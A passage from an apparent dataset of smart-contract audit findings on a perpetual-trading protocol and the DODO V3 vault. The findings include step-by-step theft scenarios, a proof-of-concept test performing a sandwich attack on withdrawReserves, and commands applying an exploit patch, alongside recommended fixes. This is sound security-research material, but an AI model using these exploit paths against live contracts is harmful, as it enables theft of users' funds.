be delayed or not performed at all. When liquidation is not performed in a timely manner, PartyB ended up taking on additional unnecessary risks that could be avoided in the first place if a different liquidation incentive mechanism is adopted, potentially leading to PartyB losing more assets than expected.\\nAlthough PartyBs are incentivized to perform liquidation themselves since it is the PartyBs that take on the most risks from the late liquidation, the roles of PartyB and liquidator are clearly segregated in the protocol design. Only addresses granted the role of liquidators can perform liquidation as the liquidation functions are guarded by `onlyRole(LibAccessibility.LIQUIDATOR_ROLE)`. Unless the contracts are implemented in a manner that automatically grants a liquidator role to all new PartyB upon registration OR liquidation functions are made permissionless, PartyBs are likely not able to perform the liquidation themselves when the need arises.\\nMoreover, the PartyBs are not expected to be both a hedger and liquidator simultaneously as they might not have the skillset or resources to maintain an infrastructure for monitoring their accounts/positions for potential late liquidation.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n -`emergencyClosePosition` can be blockedчmediumчThe `emergencyClosePosition` function can be blocked as PartyA can change the position's status, which causes the transaction to revert when executed.\\nActivating the emergency mode can be done either for a specific PartyB or for the entire system. Once activated, PartyB gains the ability to swiftly close positions without requiring users' requests. This functionality is specifically designed to cater to urgent situations where PartyBs must promptly close their positions.\\nBased on the `PartyBFacetImpl.emergencyClosePosition` function, a position can only be \"emergency\" close if its status is `QuoteStatus.OPENED`.\\n```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\n\\nAs a result, if PartyA knows that emergency mode has been activated, PartyA could pre-emptively call the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) against their positions to change the state to `QuoteStatus.CLOSE_PENDING` so that the `PartyBFacetImpl.emergencyClosePosition` function will always revert when triggered by PartyB. This effectively blocks PartyB from \"emergency\" close the positions in urgent situations.\\nPartyA could also block PartyB \"emergency\" close on-demand by front-running PartyB's `PartyBFacetImpl.emergencyClosePosition` transaction with the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) when detected.\\nPartyB could accept the close position request of 1 wei to revert the quote's status back to `QuoteStatus.OPENED` and try to perform an \"emergency\" close again. However, a sophisticated malicious user could front-run PartyA to revert the quote's status back to `QuoteStatus.CLOSE_PENDING` again to block the \"emergency\" close for a second time.чUpdate the `emergencyClosePosition` so that the \"emergency\" close can still proceed even if the position's status is `QuoteStatus.CLOSE_PENDING`.\\n```\\nfunction emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// Remove the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n// Add the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED || quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\nчDuring urgent situations where emergency mode is activated, the positions need to be promptly closed to avoid negative events that could potentially lead to serious loss of funds (e.g. the protocol is compromised, and the attacker is planning to or has started draining funds from the protocols). However, if the emergency closure of positions is blocked or delayed, it might lead to unrecoverable losses.ч```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\n -Position value can fall below the minimum acceptable quote valueчmediumчPartyB can fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue). As a result, it breaks the invariant that the value of position must be above the minimum acceptable quote value, leading to various issues and potentially losses for the users.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n }\\n```\\n\\nIf the user has already sent the close request, but partyB has not filled it yet, the user can request to cancel it by calling the `CancelCloseRequest` function. This will cause the quote's status to change to `QuoteStatus.CANCEL_CLOSE_PENDING`.\\nPartyB can either accept the cancel request or fill the close request ignoring the user's request. If PartyB decided to go ahead to fill the close request partially, the second branch of the if-else statement at Line 196 will be executed. However, the issue is that within this branch, PartyB is not subjected to the `minAcceptableQuoteValue` validation check. Thus, it is possible for PartyB to fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue).чIf the user sends a close request and PartyB decides to go ahead to fill the close request partially, consider checking if the remaining value of the position is above the minimum acceptable quote value (minAcceptableQuoteValue) after PartyB has filled the position.\\n```\\nfunction closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n ..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n// Add the line below\\n \\n// Add the line below\\n require(\\n// Add the line below\\n quote.lockedValues.total() >=\\n// Add the line below\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n// Add the line below\\n \"LibQuote: Remaining quote value is low\"\\n// Add the line below\\n );\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n}\\n```\\nчIn the codebase, the `minAcceptableQuoteValue` is currently set to 5 USD. There are many reasons for having a minimum quote value in the first place. For instance, if the value of a position is too low, it will be uneconomical for the liquidator to liquidate the position because the liquidation fee would be too small or insufficient to cover the cost of liquidation. Note that the liquidation fee is computed as a percentage of the position value.\\nThis has a negative impact on the overall efficiency of the liquidation mechanism within the protocol, which could delay or stop the liquidation of accounts or positions, exposing users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.ч```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n }\\n```\\n -Rounding error when closing quoteчmediumчRounding errors could occur if the provided `filledAmount` is too small, resulting in the locked balance of an account remains the same even though a certain amount of the position has been closed.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n\\nIn Lines 157, 159, and 161 above, a malicious user could make the numerator smaller than the denominator (LibQuote.quoteOpenAmount(quote)), and the result will be zero due to a rounding error in Solidity.\\nIn this case, the `quote.lockedValues` will not decrease and will remain the same. As a result, the locked balance of the account will remain the same even though a certain amount of the position has been closed. This could cause the account's locked balance to be higher than expected, and the errors will accumulate if it happens many times.чWhen the `((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote)))` rounds down to zero, this means that a rounding error has occurred as the numerator is smaller than the denominator. The CVA, `filledAmount` or both might be too small.\\nConsider performing input validation against the `filledAmount` within the `fillCloseRequest` function to ensure that the provided values are sufficiently large and will not result in a rounding error.чWhen an account's locked balances are higher than expected, their available balance will be lower than expected. The available balance affects the amount that users can withdraw from their accounts. The \"silent\" increase in their locked values means that the amount that users can withdraw becomes lesser over time, and these amounts are lost due to the errors.ч```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n -Consecutive symbol price updates can be exploited to drain protocol fundsчmediumчRepeatedly updating the symbol prices for the symbols used in Party A's positions mid-way through a liquidation while maintaining the same Party A's UPnL and total unrealized losses leads to more profits for Party B and effectively steals funds from the protocol.\\nThe `setSymbolsPrice` function in the `LiquidationFacetImpl` library is used to set the prices of symbols for Party A's positions. It is called by the liquidator, who supplies the `PriceSig memory priceSig` argument, which contains, among other values, the prices of the symbols as well as the `upnl` and `totalUnrealizedLoss` of Party A's positions.\\nParty A's `upnl` and `totalUnrealizedLoss` values are stored in Party A's liquidation details and enforced to remain the same for consecutive calls to `setSymbolsPrice` via the `require` statement in lines 90-95.\\nHowever, as long as those two values remain the same, the liquidator can set the prices of the symbols to the current market prices (fetched by the Muon app). If a liquidator liquidates Party A's open positions in multiple calls to `liquidatePositionsPartyA` and updates symbol prices in between, Party B potentially receives more profits than they should have.\\nThe git diff below contains a test case to demonstrate the following scenario:\\nGiven the following symbols:\\n`BTCUSDT`\\n`AAVEUSDT`\\nFor simplicity, we assume trading fees are 0.\\nParty A's allocated balance: `100e18 USDT`\\nParty A has two open positions with Party B:\\nID Symbol Order Type Position Type Quantity Price Total Value CVA LF MM Total Locked Leverage\\n1 BTCUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\n2 AAVEUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\nParty A's available balance: 100e18 - 100e18 = 0 USDT\\nNow, the price of `BTCUSDT` drops by 40% to `0.6e18 USDT`. Party A's `upnl` and `totalUnrealizedLoss` are now `-40e18 USDT` and `-40e18 USDT`, respectively.\\nParty A is insolvent and gets liquidated.\\nThe liquidator calls `setSymbolsPrice` for both symbols, setting the price of `BTCUSDT` to `0.6e18 USDT` and the price of `AAVEUSDT` to `1e18 USDT`. The `liquidationDetails` of Party A are as follows:\\nliquidationType: `LiquidationType.NORMAL`\\nupnl: `-40e18 USDT`\\ntotalUnrealizedLoss: `-40e18 USDT`\\ndeficit: 0\\nliquidationFee: `50e18 - 40e18 = 10e18 USDT`\\nThe liquidator first liquidates position 1 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nNow, due to a volatile market, the price of `AAVEUSDT` drops by 40% to `0.6e18 USDT`. The liquidator calls `setSymbolsPrice` again, setting the price of `AAVEUSDT` to `0.6e18 USDT`. `upnl` and `totalUnrealizedLoss` remain the same. Thus the symbol prices can be updated.\\nThe liquidator liquidates position 2 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nParty B received in total `65e18 + 65e18 = 130e18 USDT`, which is `30e18` USDT more than Party A's initially locked balances. Those funds are effectively stolen from the protocol and bad debt.\\nConversely, if both positions had been liquidated in the first call without updating the symbol prices in between, Party B would have received `40e18 + 25e18 = 65e18 USDT`, which Party A's locked balances covered.\\n\\nHow to run this test case:\\nSave git diff to a file named `exploit-liquidation.patch` and run with\\n```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\nчConsider preventing the liquidator from updating symbol prices mid-way of a liquidation process.\\nOr, alternatively, store the number of Party A's open positions in the `liquidationDetails` and only allow updating the symbol prices if the current number of open positions is still the same, effectively preventing the liquidator from updating the symbol prices once a position has been liquidated.чA malicious liquidator can cooperate with Party B and by exploiting this issue during a volatile market, can cause Party B to receive more funds (profits, due to being the counterparty to Party A which faces losses) than it should and steal funds from the protocol.ч```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n -User can perform sandwich attack on withdrawReserves for profitчhighчA malicious user could listen to the mempool for calls to `withdrawReserves`, at which point they can perform a sandwich attack by calling `userDeposit` before the withdraw reserves transaction and then `userWithdraw` after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.\\nWhen a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. As specified in an inline comment, the exchange rate is calculated like so:\\n```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n\\nwhere `reserves = info.totalReserves - info.withdrawnReserves`. When the owner of the vault calls `withdrawReserves` the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.\\nBelow is a diff to the existing test suite that demonstrates the sandwich attack in action:\\n```\\ndiff --git a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\nindex a699162..337d1f5 100644\\n--- a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n@@ -233,6 // Add the line below\\n233,47 @@ contract D3VaultTest is TestContext {\\n assertEq(d3Vault.getTotalDebtValue(address(d3MM)), 1300 ether);\\n }\\n \\n// Add the line below\\n function testWithdrawReservesSandwichAttack() public {\\n// Add the line below\\n // Get dToken\\n// Add the line below\\n (address dToken2,,,,,,,,,,) = d3Vault.getAssetInfo(address(token2));\\n// Add the line below\\n \\n// Add the line below\\n // Approve tokens\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n D3Token(dToken2).approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n\\n// Add the line below\\n // Set user quotas and mint tokens\\n// Add the line below\\n mockUserQuota.setUserQuota(user1, address(token2), 1000 ether);\\n// Add the line below\\n mockUserQuota.setUserQuota(user2, address(token2), 1000 ether);\\n// Add the line below\\n token2.mint(user1, 1000 ether);\\n// Add the line below\\n token2.mint(user2, 1000 ether);\\n// Add the line below\\n\\n// Add the line below\\n // User 1 deposits to allow pool to borrow\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n d3Proxy.userDeposit(user1, address(token2), 500 ether);\\n// Add the line below\\n token2.mint(address(d3MM), 100 ether);\\n// Add the line below\\n poolBorrow(address(d3MM), address(token2), 100 ether);\\n// Add the line below\\n\\n// Add the line below\\n vm.warp(365 days // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n // Accrue interest from pool borrow\\n// Add the line below\\n d3Vault.accrueInterest(address(token2));\\n// Add the line below\\n uint256 reserves = d3Vault.getReservesInVault(address(token2));\\n// Add the line below\\n\\n// Add the line below\\n // User 2 performs a sandwich attack on the withdrawReserves call to make a profit\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userDeposit(user2, address(token2), 100 ether);\\n// Add the line below\\n vm.prank(vaultOwner);\\n// Add the line below\\n d3Vault.withdrawReserves(address(token2), reserves);\\n// Add the line below\\n uint256 dTokenBalance = D3Token(dToken2).balanceOf(user2);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userWithdraw(user2, address(token2), dToken2, dTokenBalance);\\n// Add the line below\\n assertGt(token2.balanceOf(user2), 1000 ether);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testWithdrawReserves() public {\\n vm.prank(user1);\\n token2.approve(address(dodoApprove), type(uint256).max);\\n```\\nчThere are a couple of ways this type of attack could be prevented:\\nUser deposits could have a minimum lock time in the protocol to prevent an immediate withdraw. However the downside is the user will still profit in the same manner due to the fluctuation in exchange rates.\\nIncreasing reserves whilst accruing interest could have an equal and opposite decrease in token balance accounting. Every time reserves increase you are effectively taking token value out of the vault and \"reserving\" it for the protocol. Given the borrow rate is higher than the reserve increase rate, the exchange rate will continue to increase. I think something like the following would work (please note I haven't tested this):\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\nindex 2fb9364..9ad1702 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n@@ // Remove the line below\\n157,6 // Add the line below\\n157,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 compoundInterestRate = getCompoundInterestRate(borrowRatePerSecond, deltaTime);\\n totalBorrowsNew = borrowsPrior.mul(compoundInterestRate);\\n totalReservesNew = reservesPrior // Add the line below\\n (totalBorrowsNew // Remove the line below\\n borrowsPrior).mul(info.reserveFactor);\\n// Add the line below\\n info.balance = info.balance // Remove the line below\\n (totalReservesNew // Remove the line below\\n reservesPrior);\\n borrowIndexNew = borrowIndexPrior.mul(compoundInterestRate);\\n \\n accrualTime = currentTime;\\n@@ // Remove the line below\\n232,7 // Add the line below\\n233,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n// Remove the line below\\n return (cash // Add the line below\\n info.totalBorrows // Remove the line below\\n (info.totalReserves // Remove the line below\\n info.withdrawnReserves)).div(dTokenSupply);\\n// Add the line below\\n return (cash // Add the line below\\n info.totalBorrows).div(dTokenSupply);\\n } \\n \\n /// @notice Make sure accrueInterests or accrueInterest(token) is called before\\n```\\nчAn attacker can perform a sandwich attack on calls to `withdrawReserves` to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.ч```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n -Calls to liquidate don't write down totalBorrows which breaks exchange rateчhighчWhen a pool is liquidated, the `totalBorrows` storage slot for the token in question should be decremented by `debtToCover` in order to keep the exchange rate of the corresponding `pToken` correct.\\nWhen users call `liquidate` to `liquidate` a pool, they specify the amount of debt they want to cover. In the end this is used to write down the borrow amount of the pool in question:\\n```\\nrecord.amount = borrows - debtToCover;\\n```\\n\\nHowever, the `totalBorrows` of the token isn't written down as well (like it should be). The `finishLiquidation` method correctly writes down the `totalBorrows` state.чThe `liquidate` method should include the following line to write down the total borrow amount of the debt token being liquidated:\\n```\\ninfo.totalBorrows = info.totalBorrows - debtToCover;\\n```\\nчWhen a user calls `liquidate` to `liquidate` a pool, the exchange rate of the token (from its pToken) remains high (because the `totalBorrows` for the token isn't decremented). The result is that users that have deposited this ERC20 token are receiving a higher rate of interest than they should. Because this interest is not being covered by anyone the end result is that the last withdrawer from the vault will not be able to redeem their pTokens because there isn't enough of the underlying ERC20 token available. The longer the period over which interest accrues, the greater the incentive for LPs to withdraw early.ч```\\nrecord.amount = borrows - debtToCover;\\n```\\n -Anyone can sell other users' tokens as `fromToken`, and get the `toToken`'s themselves due to `decodeData.payer` is never checked.чhighчAnyone can sell other users' tokens as `fromToken`, and get the toToken's themselves due to `decodeData.payer` is never checked.\\nLet's examine the token-selling process and the transaction flow.\\nThe user will initiate the transaction with the `sellTokens()` method in the `D3Proxy.sol` contract, and provide multiple inputs like `pool`, `fromToken`, `toToken`, `fromAmount`, `data` etc.\\n```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, \"D3PROXY_VALUE_INVALID\");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n\\nAfter some checks, this method in the `D3Proxy.sol` will make a call to the `sellToken()` function in the pool contract (inherits D3Trading.sol). After this call, things that will happen in the pool contract are:\\nTransferring the toToken's to the \"to\" address (with _transferOut)\\nMaking a callback to `D3Proxy` contract to deposit fromToken's to the pool. (with IDODOSwapCallback(msg.sender).d3MMSwapCallBack)\\nChecking the pool balance and making sure that the fromToken's are actually deposited to the pool. (with this line: IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount)\\n```\\n// File: D3Trading.sol\\n// Method: sellToken()\\n108.--> _transferOut(to, toToken, receiveToAmount);\\n109.\\n110. // external call & swap callback\\n111.--> IDODOSwapCallback(msg.sender).d3MMSwapCallBack(fromToken, fromAmount, data);\\n112. // transfer mtFee to maintainer\\n113. _transferOut(state._MAINTAINER_, toToken, mtFee);\\n114.\\n115. require(\\n116.--> IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount,\\n117. Errors.FROMAMOUNT_NOT_ENOUGH\\n118. );\\n```\\n\\nThe source of the vulnerability is the `d3MMSwapCallBack()` function in the `D3Proxy`. It is called by the pool contract with the `fromToken`, `fromAmount` and `data` inputs to make a `fromToken` deposit to the pool.\\n```\\n//File: D3Proxy.sol \\n /// @notice This callback is used to deposit token into D3MM\\n /// @param token The address of token\\n /// @param value The amount of token need to deposit to D3MM\\n /// @param _data Any data to be passed through to the callback\\n function d3MMSwapCallBack(address token, uint256 value, bytes calldata _data) external override {\\n require(ID3Vault(_D3_VAULT_).allPoolAddrMap(msg.sender), \"D3PROXY_CALLBACK_INVALID\");\\n SwapCallbackData memory decodeData;\\n decodeData = abi.decode(_data, (SwapCallbackData));\\n--> _deposit(decodeData.payer, msg.sender, token, value);\\n }\\n```\\n\\nAn attacker can create a `SwapCallbackData` struct with any regular user's address, encode it and pass it through the `sellTokens()` function, and get the toToken's.\\nYou can say that `_deposit()` will need the payer's approval but the attackers will know that too. A regular user might have already approved the pool & proxy for the max amount. Attackers can easily check any token's allowances and exploit already approved tokens. Or they can simply watch the mempool and front-run any normal seller right after they approve but before they call the `sellTokens()`.чI would recommend to check if the `decodeData.payer == msg.sender` in the beginning of the `sellTokens()` function in `D3Proxy` contract. Because msg.sender will be the pool's address if you want to check it in the `d3MMSwapCallBack()` function, and this check will not be valid to see if the payer is actually the seller.\\nAnother option might be creating a local variable called \"seller\" and saving the msg.sender value when they first started the transaction. After that make `decodeData.payer == seller` check in the `d3MMSwapCallBack()`.чAn attacker can sell any user's tokens and steal their funds.ч```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, \"D3PROXY_VALUE_INVALID\");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n -When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vaultчhighчWhen a D3MM pool repays all of the borrowed funds to vault using D3Funding.sol repayAll, an attacker can steal double the amount of those funds from vault. This is because the balance of vault is not updated correctly in D3VaultFunding.sol _poolRepayAll.\\n`amount` should be added in `info.balance` instead of being subtracted.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n\\nA `D3MM pool` can repay all of the borrowed funds from vault using the function D3Funding.sol repayAll which further calls D3VaultFunding.sol poolRepayAll and eventually D3VaultFunding.sol _poolRepayAll.\\n```\\n function repayAll(address token) external onlyOwner nonReentrant poolOngoing {\\n ID3Vault(state._D3_VAULT_).poolRepayAll(token);\\n _updateReserve(token);\\n require(checkSafe(), Errors.NOT_SAFE);\\n }\\n```\\n\\nThe vault keeps a record of borrowed funds and its current token balance.\\n`_poolRepayAll()` is supposed to:\\nDecrease the borrowed funds by the repaid amount\\nIncrease the token balance by the same amount #vulnerability\\nTransfer the borrowed funds from pool to vault\\nHowever, `_poolRepayAll()` is decreasing the token balance instead.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n .\\n .\\n\\n info.totalBorrows = 